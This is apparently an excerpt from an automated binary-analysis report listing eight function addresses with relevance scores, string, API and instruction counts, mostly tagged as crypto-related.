Function 00418940, Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Function 0041BCF2, Relevance: 4.3, Strings: 3, Instructions: 520
COMMONCrypto

Function 00408C90, Relevance: 1.7, Strings: 1, Instructions: 423
COMMONCrypto

Function 0041C4BF, Relevance: 1.5, Strings: 1, Instructions: 273
COMMONCrypto

Function 0041BBEA, Relevance: 1.4, Strings: 1, Instructions: 184
COMMONCrypto

Function 0041BB78, Relevance: 1.4, Strings: 1, Instructions: 157
COMMONCrypto

Function 0041B8D6, Relevance: 1.4, Strings: 1, Instructions: 136
COMMONCrypto

Function 00402FB0, Relevance: .4, Instructions: 435
COMMONCrypto